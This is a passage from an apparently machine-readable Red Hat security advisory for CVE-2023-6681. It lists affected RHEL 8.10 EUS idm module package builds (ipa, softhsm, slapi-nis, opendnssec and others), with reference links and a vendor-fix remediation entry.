"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6681"
},
{
"category": "external",
"summary": "RHBZ#2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6681"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681"
}
],
"release_date": "2023-12-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
